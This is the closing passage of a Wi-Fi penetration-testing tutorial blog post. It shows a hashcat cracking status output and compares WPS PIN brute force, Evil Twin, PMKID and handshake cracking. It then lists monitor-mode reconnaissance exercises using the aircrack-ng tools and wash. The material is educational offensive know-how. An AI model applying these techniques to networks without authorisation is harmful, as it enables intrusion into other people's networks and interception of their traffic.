Speed.#1.........: 1045 H/s (0.23ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 100/10000 (1.00%)
Rejected.........: 0/100 (0.00%)
Restore.Point....: 0/10000 (0.00%)
Candidates.#1....: 123456 -> TargetPassword123
Started: Fri Jul 10 15:19:55 2026
Stopped: Fri Jul 10 15:20:02 2026
kali@kali:~$

Choosing the Right Attack

Twenty years of patching hasn’t killed 802.11 as an attack surface, it’s just narrowed the easy paths and forced attackers (and defenders) to be more deliberate about which one they take. Picking the wrong strategy wastes hours you don’t get back on an engagement.

If WPS is enabled and unpatched, that’s your fastest route in: 11,000 possible PINs is nothing next to a full WPA2 keyspace. If you just need visibility into a target’s traffic rather than the password itself, Evil Twin gets you there without ever touching PSK cracking. If you’re stuck with a straight WPA2-PSK target, PMKID is worth trying first since it requires no client interaction, and the 4-way handshake with a good custom wordlist is your fallback. None of these are fast in an absolute sense. All of them are faster than the alternative of guessing blind.

Exercises

  1. Run iwconfig and identify every wireless interface on your system.
  2. Use airmon-ng to put your adapter into monitor mode.
  3. Run airodump-ng and log every AP and connected client within range.
  4. Open Wireshark and build a display filter that isolates only traffic from your own Wi-Fi connection.
  5. Run wash against your monitor interface and identify any nearby devices with WPS enabled.

Buy me A Coffee!

Support The CyberSec Guru’s Mission

🔐 Fuel the cybersecurity crusade by buying me a coffee! Your contribution powers free tutorials, hands-on labs, and security resources.

Why your support matters:
  • Writeup Access: Get complete writeup access within 12 hours
  • Zero paywalls: Keep the main content 100% free for learners worldwide

Perks for one-time supporters:
☕️ $5: Shoutout in Buy Me a Coffee
🛡️ $8: Fast-track Access to Live Webinars
💻 $10: Vote on future tutorial topics + exclusive AMA access

“Your coffee keeps the servers running and the knowledge flowing in our fight against cybercrime.”☕ Support My Work

Buy Me a Coffee Button

If you like this post, then please share it:

Discover more from The CyberSec Guru

Subscribe to get the latest posts sent to your email!

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Discover more from The CyberSec Guru

Subscribe now to keep reading and get access to the full archive.

Continue reading